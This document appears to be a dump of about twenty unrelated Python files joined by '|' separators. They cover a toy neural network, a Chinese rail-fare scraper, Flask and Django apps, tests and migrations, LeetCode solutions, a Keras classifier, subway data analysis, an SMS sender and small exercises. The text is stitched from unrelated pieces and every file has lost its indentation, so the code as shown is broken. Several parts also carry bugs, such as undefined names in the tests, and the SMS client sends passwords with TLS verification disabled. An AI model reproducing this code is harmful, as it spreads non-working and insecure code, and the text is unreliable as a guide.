# Seed random number generator to return the same random number every time the program is executed.
np.random.seed(1)
# Single neuron. 3 inputs and 1 output. Generate 3x1 matrix with values between -1 and 1 and mean 0
self.synaptic_weights = (2 * np.random.random((3,1))) - 1
# The Sigmoid function, which describes an S shaped curve.
# We pass the weighted sum of the inputs through this function to
# normalise them between 0 and 1.
def _sigmoid(self, x):
return 1/(1 + np.exp(-x))
def _sigmoid_derivative(self, x):
return x*(1-x)
def think(self, inputs):
return self._sigmoid(np.dot(inputs, self.synaptic_weights))
def train(self, training_set_inputs, training_set_outputs, iterations):
for i in range(iterations):
output = self.think(training_set_inputs)
error = training_set_outputs - output
adjustment = np.dot(training_set_inputs.T, error * self._sigmoid_derivative(output))
self.synaptic_weights += adjustment
if (i%1000) == 0:
print ("Error after {} iterations is: {}".format(str(i), np.mean(np.abs(error))))
x = NeuralNetwork()
x.train(training_set_inputs, training_set_outputs, 10000)
test = np.array([[1, 0, 1]])
print ("Value predicted for {} is: {}".format(test, str(x.think(test))))
|
# -*- coding: UTF-8 -*
import threading
from ProApi import *
from colorama import init, Fore, Back, Style
threadLock = threading.Lock()
init(autoreset=False)
class Colored(object):
# 前景色:红色 背景色:默认
def red(self, s):
return Fore.LIGHTRED_EX + s + Fore.RESET
# 前景色:绿色 背景色:默认
def green(self, s):
return Fore.LIGHTGREEN_EX + s + Fore.RESET
def yellow(self, s):
return Fore.LIGHTYELLOW_EX + s + Fore.RESET
def white(self,s):
return Fore.LIGHTWHITE_EX + s + Fore.RESET
def blue(self,s):
return Fore.LIGHTBLUE_EX + s + Fore.RESET
class myThread (threading.Thread):
def __init__(self, threadID, threadName, train_no, from_station_no, to_station_no, seat_types, date,pricesDic):
threading.Thread.__init__(self)
self.threadID = threadID
self.threadName = threadName
self.train_no = train_no
self.from_station_no = from_station_no
self.to_station_no = to_station_no
self.seat_types = seat_types
self.date = date
self.pricesDic = pricesDic
def run(self):
#print ("开始线程:" + self.threadName)
# 获取锁,用于线程同步
threadLock.acquire()
getPrice(self.threadName, self.train_no, self.from_station_no, self.to_station_no, self.seat_types, self.date, self.pricesDic)
# 释放锁,开启下一个线程
threadLock.release()
#print ("退出线程:" + self.threadName)
def getPrice(threadName, train_no, from_station_no, to_station_no, seat_types, date,pricesDic):
while 1:
try:
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
moneyUrl = "https://kyfw.12306.cn/otn/leftTicket/queryTicketPrice?train_no={}&from_station_no={}&to_station_no={}&seat_types={}&train_date={}".format(
train_no, from_station_no, to_station_no, seat_types, date)
req = urllib.request.Request(url=moneyUrl, headers=headers)
r_price = urllib.request.urlopen(req).read().decode('utf-8')
if r_price.startswith(u'\ufeff'):
r_price = r_price.encode('utf8')[3:].decode('utf-8')
# print(r_price)
r_price = json.loads(r_price)
break
except:
continue
price = r_price['data']
price = dict(price)
A = ('A9' in price.keys())
if A == False:
A = ('P' in price.keys())
if A == False:
A = ''
else:
A = price['P']
else:
A = price['A9']
B = ('M' in price.keys())
if B == False:
B = ''
else:
B = price['M']
C = ('O' in price.keys())
if C == False:
C = ''
else:
C = price['O']
D = ('A6' in price.keys())
if D == False:
D = ''
else:
D = price['A6']
E = ('A4' in price.keys())
if E == False:
E = ''
else:
E = price['A4']
F = ('F' in price.keys())
if F == False:
F = ''
else:
F = price['F']
G = ('A3' in price.keys())
if G == False:
G = ''
else:
G = price['A3']
H = ('A2' in price.keys())
if H == False:
H = ''
else:
H = price['A2']
# print("软座:"+H)
I = ('A1' in price.keys())
if I == False:
I = ''
else:
I = price['A1']
J = ('WZ' in price.keys())
if J == False:
J = ''
else:
J = price['WZ']
pricesDic['A'] = A
pricesDic['B'] = B
pricesDic['C'] = C
pricesDic['D'] = D
pricesDic['E'] = E
pricesDic['F'] = F
pricesDic['G'] = G
pricesDic['H'] = H
pricesDic['I'] = I
pricesDic['J'] = J
|
import os
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_restless import APIManager
def get_app(settings=None):
app = Flask(__name__)
app.config.from_object(settings)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
return app
def get_db(app):
db = SQLAlchemy(app)
db.init_app(app)
return db
app = get_app(settings=os.environ['APP_SETTINGS'])
db = get_db(app)
manager = APIManager(app, flask_sqlalchemy_db=db)
def configure_routes():
from model import Mountain
manager.create_api(Mountain, methods=['GET', 'POST', 'DELETE'])
@app.route('/')
def hello():
return "Hello World!"
@app.route('/<name>')
def hello_name(name):
return "Hello {}!".format(name)
if __name__ == '__main__':
#pass
configure_routes()
db.create_all()
app.run(host='0.0.0.0', port=app.config['PORT'])
|
skub = open("product.txt", "r")
root = "U-PLT"
grade = []
serie_a = []
serie_b = []
rin = []
count = 0
for line in skub:
gradel = line[6:7]
serie_al = line[8:11]
serie_bl = line[12:14]
rinl = line[15:18]
if not gradel in grade: grade.append(gradel)
if not serie_al in serie_a: serie_a.append(serie_al)
if not serie_bl in serie_b: serie_b.append(serie_bl)
if not rinl in rin: rin.append(rinl)
import itertools
from pprint import pprint as pp
# g = sorted(grade)
# pp(g)
#
# sa = sorted(serie_a)
# pp(sa)
#
# sb = sorted(serie_b)
# pp(sb)
#
# r = sorted(rin)
# pp(r)
gsa = [sorted(grade), sorted(serie_a)]
gsal = list(itertools.product(*gsa))
pp(gsal)
gsab = [gsal, sorted(serie_b)]
gsabl = list(itertools.product(*gsab))
pp(gsabl)
gsabr = [gsabl, sorted(rin)]
gsabrl = list(itertools.product(*gsabr))
pp(gsabrl)
skub.close()
|
class Solution(object):
def addTwoNumbers(self, l1, l2):
a1 = []
a2 = []
n1 = 0
n2 = 0
cur1 = l1
cur2 = l2
while cur1:
a1.append(cur1.val)
cur1 = cur1.next
n1 += 1
while cur2:
a2.append(cur2.val)
cur2 = cur2.next
n2 += 1
if n1>n2:
a2 = [0]*(n1-n2) + a2
cur1 = l1
else:
a1 = [0]*(n2-n1) + a1
cur1 = l2
extra = False
for i in range(max(n1,n2)-1,-1,-1):
a1[i] += a2[i]
if a1[i]>=10:
a1[i] -= 10
if i != 0:
a1[i-1] += 1
else:
extra = True
a1 = [1]+a1
i = 0
while cur1.next:
cur1.val = a1[i]
cur1 = cur1.next
i+=1
cur1.val = a1[i]
if extra:
new = ListNode()
new.val = a1[i+1]
cur1.next = new
if n1>n2:
return l1
return l2 |
from collections import Counter
import pickle
import time
import numpy as np
from definitions import F, logF, logProbabilityF, max_array_size, large_log_sum
from conditions import *
## helpers
def countruns(x):
padded = np.insert(x, 0, 0) # pad left side with 0
ups = np.diff(padded+0) == 1
return np.count_nonzero(ups)
## computation functions for simple line plots
def total_counts_vs_m():
M_vec = [2 ** e for e in range(3, 16+1)]
c_array, c_runs, c_total = [], [], []
for M in M_vec:
print(M)
a, r, t = total_counts_for_m(M)
c_array.append(a)
c_runs.append(r)
c_total.append(t)
data = {
'M': M_vec,
'array': c_array,
'runs': c_runs,
'total': c_total,
}
fname = 'data/total_counts_vs_m.pickle'
with open(fname, 'w') as f:
pickle.dump(data, f)
def total_counts_for_m(M):
# compute total count of all sets in certain regions, for given value of M
# returns (in log domain):
# - s_array: total count of all array sets
# - s_runs: total count of all RLE sets
# - s_total: total count of all sets
MA = max_array_size(M)
def f_array(M, MA, card):
return range(card/2, card+1)
c_array = range(0, MA+1)
s_array = sum_F_smart(M, MA, c_array, f_array, array_cond_mutex(M, MA))
def f_runs(M, MA, card):
return range(1, min(MA/2+1, card/2))
c_runs = range(0, M+1)
s_runs = sum_F_smart(M, MA, c_runs, f_runs, runs_cond_mutex(M, MA))
return s_array, s_runs, M * np.log10(2)
## computation functions for heatmaps (analytical)
# sum_F_smart is the latest version of the grid computation
# functions, and should be faster than grid_analytical_*
def sum_F_smart(M, MA, card_vec, runs_vec_func, cond):
# compute sum of all values of F over an arbitrary region.
# M and MA are constants.
# grid is computed for every value in card_vec.
# runs_vec_func computes a new vector of runs values to be used for each value of card.
# this allows computing over an arbitrary window.
# cond is another arbitrary window function - these functions are more confidently verified than the
# runs_vec_func functions.
s = -np.inf
for card in card_vec:
print(card)
runs_vec = runs_vec_func(M, MA, card)
for runs in runs_vec:
if cond(card, runs):
v = logF(card, runs, M)
s = large_log_sum(v, s)
return s
def grid_analytical_logF_conditional(M, card_vec, runs_vec, width, cond, debug=True):
# previously known as sum_logF_for_condition
if debug:
print('summing for %s' % cond.__name__)
t0 = time.time()
z = np.ones((len(runs_vec), len(card_vec)))*-np.inf
for n, card in enumerate(card_vec):
if debug:
# print('x = %d (%d/%d)' % (card, n, len(card_vec)))
pass
for m, runs in enumerate(runs_vec):
z[m, n] = sum_logF_over_rectangle_conditional(M, [card, card+width], [runs, runs+width], cond)
# print(n, m, z[m, n])
if m > 0 and z[m, n] == 0 and z[m-1, n] > 0:
# passed out of region, stop counting
break
if debug:
print('%f sec' % (time.time() - t0))
return z
def sum_logF_over_rectangle_conditional(M, card_range, runs_range, cond):
# when summing a bunch of numbers with widely varying magnitude,
# only need to sum the top few for an accurate result.
t0 = time.time()
s = -np.inf
for card in range(card_range[0], card_range[1]):
for runs in range(runs_range[0], runs_range[1]):
if runs > card or runs > M-card+1:
# impossible region, should never compute this
break
if cond(card, runs):
# v = logF_nocheck(card, runs, M)
v = logF(card, runs, M)
# print(card, runs, v)
s = large_log_sum(s, v)
# print('10^%d sets in %sx%s (%f sec)' % (s, card_range, runs_range, time.time()-t0))
dt = time.time() - t0
return s
def grid_analytical_integral(M, cell_size):
# naively compute downsampled grid by summing over evenly spaced rectangular regions
grid = np.zeros((M/(2*cell_size)+1, M/cell_size+1))
# cvec and rvec represent lower-left corner of cell
cvec = range(0, M+1, cell_size)
rvec = range(0, M/2+1, cell_size)
for x, card in enumerate(cvec):
for y, runs in enumerate(rvec):
grid[y, x] = sum_F_over_rectangle(M, [card, card+cell_size], [runs, runs+cell_size])
# print(grid)
return grid, cvec, rvec
def sum_F_over_rectangle(M, card_range, runs_range):
# naively sum exact F values over rectangular region
s = 0
for card in range(card_range[0], card_range[1]):
for runs in range(runs_range[0], runs_range[1]):
v = F(card, runs, M)
s += v
# print('%d added for (%d, %d) - (%s, %s)' % (v, card, runs, card_range, runs_range))
return s
def grid_analytical_log_prob_sampled(Nbits, width):
# compute samples of the grid for a given Nbits.
# samples are spaced 'width' pixels apart
grid = np.ones((width/2+1, width+1)) * -np.inf
cvec = range(1, Nbits+1, Nbits/width)
rvec = range(1, Nbits/2+1, Nbits/width)
for x, cardinality in enumerate(cvec):
print(cardinality)
for y, runcount in enumerate(rvec):
grid[y, x] = logProbabilityF(cardinality, runcount, Nbits)
return grid, cvec, rvec
def grid_analytical_log_sampled(M, width):
grid = np.zeros((width/2, width))
cvec = range(0, M, M/width)
rvec = range(0, M/2, M/width)
for x, cardinality in enumerate(cvec):
print(cardinality)
for y, runcount in enumerate(rvec):
grid[y, x] = logF(cardinality, runcount, M)
return grid, cvec, rvec
def grid_analytical_exact(Nbits):
# compute full grid for Nbits. will be slow for Nbits > 2^10 or so
grid = np.zeros((Nbits/2, Nbits))
cvec = range(1, Nbits+1)
rvec = range(1, Nbits/2+1)
for cardinality in cvec:
for runcount in rvec:
grid[runcount-1, cardinality-1] = F(cardinality, runcount, Nbits)
return grid, cvec, rvec
## computation functions for heatmaps (stochastic, brute-force)
def grid_stochastic_large(Nbits, Niter, density=None, Nset=None):
# for roaring-sized Nbits, can't use a grid
# also return the x, y axis vectors
result = Counter()
n_min, n_max = np.inf, -np.inf
nr_min, nr_max = np.inf, -np.inf
for k in range(Niter):
if density:
bits = np.random.random(size=(Nbits,)) <= density
elif Nset:
# TODO use random permutation to set exactly Nset bits
# this will show an actual marginal distribution - a 1d slice for N=Nset
pass
n = np.count_nonzero(bits)
nr = countruns(bits)
n_min = min(n_min, n)
n_max = max(n_max, n)
nr_min = min(nr_min, nr)
nr_max = max(nr_max, nr)
result[(nr, n)] += 1
n_vec = np.arange(n_min, n_max+1)
nr_vec = np.arange(nr_min, nr_max+1)
grid = np.zeros((len(nr_vec), len(n_vec)))
for (nr, n), count in result.items():
grid[nr-nr_min, n-n_min] = count
return grid, n_vec, nr_vec
def grid_stochastic(Nbits, Niter, density):
# for moderately large Nbits, we have to sample
# also return the x, y axis vectors
grid = np.zeros((Nbits/2+1, Nbits+1))
for k in range(Niter):
bits = np.random.random(size=(Nbits,)) <= density
n = np.count_nonzero(bits)
nr = countruns(bits)
grid[nr, n] += 1
return grid, range(0, Nbits+1), range(0, Nbits/2+1)
def grid_deterministic(Nbits=8, debug=False):
# for small enough Nbits, we can check every possible set
# also return the x, y axis vectors
grid = np.zeros((Nbits/2+1, Nbits+1))
vals = range(2**Nbits)
for i in vals:
bitstr = format(i, '08b')
bits = np.array([1 if b == '1' else 0 for b in bitstr])
n = sum(bits)
nr = countruns(bits)
grid[nr, n] += 1
if debug:
print('%3d %s %2d %d' % (i, bitstr, n, nr, array_encode(bits), rl_encode(bits)))
return grid, range(0, Nbits+1), range(0, Nbits/2+1)
def array_encode(bits, bpe=3):
a_vec = np.where(bits)
encoded = []
for a in a_vec:
encoded.append(format(a, '03b'))
return ' '.join(encoded)
def rl_encode(bits, bpe=3):
pass
|
# Generated by Django 3.2.3 on 2021-06-12 15:42
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pizza_app', '0012_auto_20210612_0526'),
]
operations = [
migrations.AddField(
model_name='ingredientsize',
name='multiple_option',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='ingredientsize',
name='special_price',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='pizza',
name='special_price',
field=models.IntegerField(default=0),
),
]
|
"""
剑指offer第12题,矩阵中的路径。
请设计一个函数,用来判断在一个矩阵中是否存在一条包含某字符串所有字符的路径。路径可以从矩阵中的任意一格开始,每一步可以在矩阵中向左、右、上、下移动一格。如果一条路径经过了矩阵的某一格,那么该路径不能再次进入该格子。例如,在下面的3×4的矩阵中包含一条字符串“bfce”的路径(路径中的字母用加粗标出)。
[["A","B","c","e"],
["s","F","c","s"],
["a","D","e","e"]]
但矩阵中不包含字符串“abfb”的路径,因为字符串的第一个字符b占据了矩阵中的第一行第二个格子之后,路径不能再次进入这个格子。
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/ju-zhen-zhong-de-lu-jing-lcof
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
"""
# 刚刚探讨了8皇后问题,显然这个问题也可以用类似的回溯法来解决。
def exist1(board, word):
"""
判断某个board里边是否存在连续的字母可以凑成当前的word。
首先默认是board和word都存在的情况。
:param board:
:param word:
:return:
"""
hight = len(board)
width = len(board[0])
wordLenght = len(word)
def checkWord(board, word, path, wordIndex, row, col):
if wordIndex == len(word):
print(path)
# path.pop()
return True
if board[row][col] == word[wordIndex]:
path.append([row, col])
if row + 1 < len(board) and [row + 1, col] not in path:
checkWord(board, word, path, wordIndex + 1, row + 1, col)
if row - 1 >= 0 and [row - 1, col] not in path:
checkWord(board, word, path, wordIndex + 1, row - 1, col)
if col < len(board[0]) and [row, col + 1] not in path:
checkWord(board, word, path, wordIndex + 1, row, col + 1)
if col >= 0 and [row, col - 1] not in path:
checkWord(board, word, path, wordIndex + 1, row, col - 1)
# yield False
# 如果想办法就是当棋盘中存在路径,那么返回True,所以可以把代码稍微更改一下。
def checkWordTrF(board, word, wordIndex, row, col):
if wordIndex == len(word):
# path.pop()
return True
if not 0 <= row < len(board) or not 0 <= col < len(board[0]) or board[row][col] != word[wordIndex]:
return False
# 为了避免走过的路径,可以将路径中走过的位置给换成不可能有的字符。
board[row][col], temp = "#", board[row][col]
res = checkWordTrF(board, word, wordIndex + 1, row + 1, col) or checkWordTrF(board, word, wordIndex + 1, row - 1,
col) or checkWordTrF(board, word,
wordIndex + 1,
row,
col + 1) or checkWordTrF(
board, word, wordIndex + 1, row, col - 1)
board[row][col] = temp
return res
if __name__ == '__main__':
board = [["a", "b", "c", "e"],
["s", "f", "c", "s"],
["a", "d", "e", "e"]]
path = []
board2 = [["C","A","A"],["A","A","A"],["B","C","D"]]
res = checkWordTrF(board2, "AAB", 0, 1, 1)
print(res)
|
from django.test import TestCase
from django.contrib.auth.models import User
from .models import Profile, Image, Comment
# Create your tests here.
class ProfileTestClass(TestCase):
'''
Test case for the Profile class
'''
def setUp(self):
'''
Method that creates an instance of Profile class
'''
# Create instance of Profile class
self.new_profile = Profile(bio="I am Groot")
def test_instance(self):
'''
Test case to check if self.new_profile in an instance of Profile class
'''
self.assertTrue(isinstance(self.new_profile, Profile))
def test_get_profiles(self):
'''
Test case to check if all profiles are gotten from the database
'''
gotten_profiles = Profile.get_profiles()
profiles = Profile.objects.all()
self.assertTrue(len(gotten_profiles) == len(profiles))
def test_get_other_profiles(self):
'''
Test case to check if all profiles are gotten from the database
'''
self.james = User(username="kiki")
self.james.save()
self.jane = User(username="ja-ne")
self.jane.save()
self.test_profile = Profile(user=self.jane, bio="Another Profile")
gotten_profiles = Profile.get_other_profiles(self.james.id)
profiles = Profile.objects.all()
class ImageTestClass(TestCase):
'''
Test case for the Image class
'''
def setUp(self):
'''
Method that creates an instance of Profile class
'''
# Create a Image instance
self.new_Image = Image(
caption='Python James is Muriuki who wrote Python content for Moringa School')
def test_instance(self):
'''
Test case to check if self.new_Image in an instance of Image class
'''
self.assertTrue(isinstance(self.new_Image, Image))
def test_get_Images(self):
'''
Test case to check if all Images are gotten from the database
'''
gotten_images = Image.get_Images()
images = Image.objects.all()
self.assertTrue(len(gotten_Images) == len(images))
def test_get_profile_Images(self):
'''
Test case to check if all Images for a specific profile are gotten from the database
'''
self.james = User(username="kiki")
self.james.save()
self.jane = User(username="ja-ne")
self.jane.save()
self.test_profile = Profile(user=self.jane, bio="Another Profile")
self.test_image = Image(user=self.jane, caption="Another Profile")
gotten_profile = Image.get_profile_images(self.jane.id)
profiles = Image.objects.all()
self.assertTrue(len(gotten_profile) == len(profiles))
class FollowTestClass(TestCase):
'''
Test case for the Follow class
'''
def test_instance(self):
'''
Test case to check if self.new_Image in an instance of Follow class
'''
self.james = User(username="kiki")
self.james.save()
self.jane = User(username="ja-ne")
self.jane.save()
self.test_profile = Profile(user=self.jane, bio="Another Profile")
self.new_follow = Follow(user=self.jane, profile=self.test_profile)
self.assertTrue(isinstance(self.new_follow, Follow))
def test_get_following(self):
'''
Test case to check if get following is getting profiles a specific user is following
'''
self.james = User(username="kiki")
self.james.save()
self.jane = User(username="ja-ne")
self.jane.save()
self.test_profile = Profile(user=self.jane, bio="Another Profile")
self.test_Image = Image(user=self.jane, caption="Another Profile")
self.new_follow = Follow(user=self.jane, profile=self.test_profile)
gotten_following = Follow.get_following(self.jane.id)
followings = Follow.objects.all()
self.assertTrue(len(gotten_following) == len(followings))
class CommentTestClass(TestCase):
'''
Test case for the Comment class
'''
def setUp(self):
'''
Method that creates an instance of Comment class
'''
# Create a Comment instance
self.new_comment = Comment(
comment_content='Python James is Muriuki who wrote Python content for Moringa School')
def test_instance(self):
'''
Test case to check if self.new_comment in an instance of Comment class
'''
self.assertTrue(isinstance(self.new_comment, Comment))
def test_get_Image_comments(self):
'''
Test case to check if get Image comments is getting comments for a specific Image
'''
self.james = User(username="kiki")
self.james.save()
self.jane = User(username="ja-ne")
self.jane.save()
self.test_profile = Profile(user=self.jane, bio="Another Profile")
self.test_Image = Image(user=self.jane, caption="Another Profile")
self.test_comment = Comment(
Image=self.test_Image, comment_content="Wow")
gotten_comments = Comment.get_Image_comments(self.test_Image.id)
comments = Comment.objects.all()
# No comments were saved so expect True
self.assertTrue(len(gotten_comments) == len(comments)) |
from os import listdir
import os
from os.path import isfile, join, isdir
import subprocess
# Run neural network for targetFile
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.optimizers import RMSprop
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Activation, Dropout, Flatten, Dense
from keras.callbacks import CSVLogger
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
#_____________________ Define model
# Model 5
IMAGE_WIDTH, IMAGE_HEIGHT = 852, 480
EPOCHS = 20
BATCH_SIZE = 8
TEST_SIZE = 149
input_shape = (IMAGE_WIDTH, IMAGE_HEIGHT, 3)
model = Sequential()
model.add(Conv2D(32, 3, 3, border_mode='same', input_shape=input_shape, activation='relu'))
model.add(Conv2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Conv2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Conv2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(Conv2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(512, 3, 3, border_mode='same', activation='relu'))
model.add(Conv2D(512, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(1024, 3, 3, border_mode='same', activation='relu'))
model.add(Conv2D(1024, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Flatten())
model.add(Dense(512, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(512, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(512, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer=RMSprop(lr=0.0001),
metrics=['accuracy'])
model.load_weights("model.h5")
test_data_generator = ImageDataGenerator(rescale=1./255)
test_generator = test_data_generator.flow_from_directory(
"./temp-spectrograms",
target_size=(IMAGE_WIDTH, IMAGE_HEIGHT),
batch_size=1,
class_mode="binary",
shuffle=False)
filenames = test_generator.filenames
nb_samples = len(filenames)
probabilities = model.predict_generator(test_generator, nb_samples)
with open("vocal-classifications.log.txt", 'w') as f:
for index, probability in enumerate(probabilities):
image_path = "./temp-spectrograms" + "/" +test_generator.filenames[index]
label = "vocal" if probability > 0.99 else "nonvocal"
print(label + ";" + str(probability[0]) + ";" + image_path)
|
#coding:utf-8
import pandas as pd
import numpy as np
import datetime
'''
找到与某站点相关的最短事务,并计算平均步行时间
每天的步行时间最好分开算
'''
def getRusultDf(dataf, station_id, dateandtime):
hang = 23 - station_id + 1
lie = station_id
X = np.zeros([hang, lie], dtype = np.int)
cols = ['in_station']
total = hang * (lie - 1)
p = 0
for h in range(hang):
in_id = station_id + h
X[h, 0] = in_id
for l in range(lie-1):
out_id = station_id - l
if (in_id) != (out_id):
X[h, l+1] = getAvgTime(in_id, out_id, dateandtime, dataf)
p+=1
process = float(p * 100) / total
print 'process : %.2f %%' % process
for c in range(lie-1):
out_id = station_id - c
cols.append(out_id)
X = pd.DataFrame(X)
X.columns = cols
return X
def getAvgTime(in_id, out_id, dateandtime, dataf):
times = []
for x in dateandtime:
temp = dfSelect(in_id, out_id, x, dataf)
if temp != -1:
times.append(temp)
#if (in_id == 15) & (out_id == 10):
# print times
if times:
return np.mean(times)
else:
return -1
def dfSelect(in_id, out_id, dateandtime, dataf):
star_time = datetime.datetime.strptime(dateandtime + '063000', '%Y%m%d%H%M%S')
end_time = datetime.datetime.strptime(dateandtime + '235900', '%Y%m%d%H%M%S')
dataf = dataf[(pd.to_datetime(dataf.in_time) >= star_time) & (pd.to_datetime(dataf.in_time) <= end_time) & (dataf.in_id == in_id) & (dataf.out_id == out_id)].loc[:,['in_seconds', 'total_time', 'C']]
if dataf.shape[0] == 0:
return -1
n_clusters_ = len(set(dataf.C))
mins = []
for i in range(n_clusters_):
tra_time = dataf[dataf.C == i].loc[:, 'total_time']
mins.append(min(tra_time))
if mins:
return np.mean(mins)
else:
return -1
station_id = 14
dwell = 25.0
print 'Start reading data...'
df = pd.read_csv("E:\Pycharm\PythonProjects\Subway\data\clusteResult\clusteResult_for"+ str(station_id) +"_line1_20141222-31.csv")
print 'Data has been read yet.'
#dt = ['20141222', '20141223', '20141224', '20141225', '20141226']
#dt = ['20141201', '20141202', '20141203', '20141204', '20141205']
#dt = ['20141206', '20141207']
#dt = ['20141201', '20141202', '20141203', '20141204']
dt = ['20141229', '20141230', '20141231']
resultDF = getRusultDf(df, station_id, dt)
print resultDF
#resultDF.to_csv('E:\Pycharm\PythonProjects\Subway\data\shortTravelTime\shortTravelTime_for14_line1_20141231.csv')
temps = []
for i in range(1, station_id):
x = resultDF.iloc[0, i]
if x > 0:
for j in range(23 - station_id + 1):
y = resultDF.iloc[j, 1]
z = resultDF.iloc[j, i]
if y > 0 and z > 0:
temp = (x + y - z + dwell)/2
temps.append(temp)
if len(temps) > 0:
print np.mean(temps)
else:
print "None" |
from .models import SMSLog, SMSLogManager
import os
import logging
import requests
# Init Logger
logger = logging.getLogger(__name__)
class Sparrow(object):
"""
Sparrow SMS Handler for the App
"""
def __init__(self):
self.__outgoingurl='https://api.sparrowsms.com/call_in.php'
self.__clientid = os.environ['SPARROW_CLIENT_ID']
self.__username = os.environ['SPARROW_USERNAME']
self.__password = os.environ['SPARROW_PASSWORD']
def setparams(self, message, user):
params = dict(
client_id = self.__clientid,
username = self.__username,
password = self.__password,
to = str(user.phone.as_international),
text = message
)
return params
def sendMessage(self, message, user):
getparams = self.setparams(message, user)
try:
req = requests.post(self.__outgoingurl, getparams, verify=False)
if req.status_code == 200:
logger.warn(message)
sm = SMSLogManager()
sm.updateLog(user, message)
return req.content
else:
logger.warn("Error sending SMS to {0}".format(
user.phone.as_international))
return req.content
except Exception, e:
logger.warn("Error sending SMS to {0}".format(
user.phone.as_international))
logger.warn("Error : {0}".format(e))
# Because the request doesn't turn out well, we just pass it
return e
def sendDirectMessage(self, message, phone):
logger.warn(message)
params = dict(
client_id = self.__clientid,
username = self.__username,
password = self.__password,
to = phone.as_international,
text = message
)
try:
req = requests.post(self.__outgoingurl, params, verify=False)
resp = req.content
return resp
except Exception, e:
logger.warn("Error sending SMS to {0}".format(
phone.as_international))
logger.warn("Error : {0}".format(e))
# Because the request doesn't turn out well, we just pass it
return e
|
#!/usr/bin/env python
# encoding: utf-8
"""
tim_locatorAtTarget.py
Created by Tim Reischmann on 2011-05-12.
Copyright (c) 2011 Tim Reischmann. All rights reserved.
"""
from pymel.core import *
'''little_toolbox_start
tim_locatorAtTarget
tim_locatorAtTarget.main()
little_toolbox_end'''
|
from flask import Flask ,render_template
app = Flask(__name__)
@app.route('/')
def hello_world():
return render_template ("index.html")
@app.route('/users/<username>/<id>') # for a route '/users/____/____', two parameters in the url get passed as username and id
def show_user_profile(username, id):
print(username)
print(id)
return "username: " + username + ", id: " + id
if __name__=="__main__":
app.run(debug=True)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-20 06:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('playlist', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='playlist',
name='mode',
field=models.CharField(choices=[('&status=completed', 'Completed'), ('&status=current', 'Currently watching'), ('&status=planned', 'Plan to watch'), ('&status=completed', 'On hold'), ('&status=dropped', 'droped')], default='&status=completed', max_length=25),
),
]
|
yes =True
no = False
# Taken from internet
Rest1 = "Joe's Gourmet Burgers" #Not Veg, Not Vegan , Not Gluten-Free
Rest2 = "Main Street Pizza Company" #Yes veg, Not Vegan , Yes Gluten-Free
Rest3 = "Corner Cafe" #Yes veg, Yes Vegan , Yes Gluten-Free
Rest4 = "Mama's Fine Italian" #Yes veg, Not Vegan , Not Gluten-Free
Rest5 = "The Chef's Kitchen" #Yes veg, Yes Vegan , Yes Gluten-Free
prompt = "Here are your restaurant choices:"
Vegan = str (input('Is anyone in your party vegan? Enter yes or no: '))
Vegetarian = str(input('Is anyone in your party vegetarian? Enter yes or no: '))
Glutenfree = str(input('Is anyone in your party Gluten Free? Enter yes or no: '))
if Vegan == 'yes' and Vegetarian == 'yes' and Glutenfree == 'yes':
print('Your options are: \n The Chef\'s kitchen. \n Cafe\' corner.')
elif Vegan == 'yes' and Vegetarian == 'yes' and Glutenfree == 'no':
print('Your options are: \n The chef\'s kitchen. \n Cafe\'e corner.')
elif Vegan == 'yes' and Vegetarian == 'no' and Glutenfree == 'no':
print('Your options are: \n the chef\'s kitchen. \n Mama\'s fine Italian Kitchen \n Main Street Pizza. \n Corner Caf\'e ')
elif Vegan == 'yes' and Vegetarian == 'no' and Glutenfree == 'yes':
print(prompt, Rest2, Rest3 , Rest5 )
elif Vegan == 'yes' and Vegetarian == 'no' and Glutenfree=='yes':
print(prompt, Rest2, Rest3, Rest5)
elif Vegan == 'yes' and Vegetarian == 'no' and Glutenfree=='no':
print(prompt,Rest2, Rest3, Rest5 )
elif Vegan == 'no' and Vegetarian == 'no' and Glutenfree=='yes':
print(prompt,Rest2, Rest3, Rest5 )
elif Vegan == 'no' and Vegetarian == 'no' and Glutenfree=='no':
print(prompt, Rest1, Rest2, Rest3, Rest4, Rest5)
else:
print('Select and option')
|
def bubble_sort(sort_list):
for num in range(len(sort_list)):
for num1 in range(len(sort_list)-1):
if sort_list[num1]>sort_list[num1+1]:
sort_list[num1], sort_list[num1+1] = sort_list[num1+1], sort_list[num1]
print(sort_list)
sort_list = []
size = int(input("Enter the size of the list-:"))
for i in range(size):
unsort_list = int(input("Enter the the element: \t"))
sort_list.append(unsort_list)
bubble_sort(sort_list)
|
from django.contrib import admin
from .models import Company, Product, ProductParameters, \
ParametersDescription, EcosystemsDescription, ClassesDescription, ProductClasses, ProductEcosystems
# Register your models here.
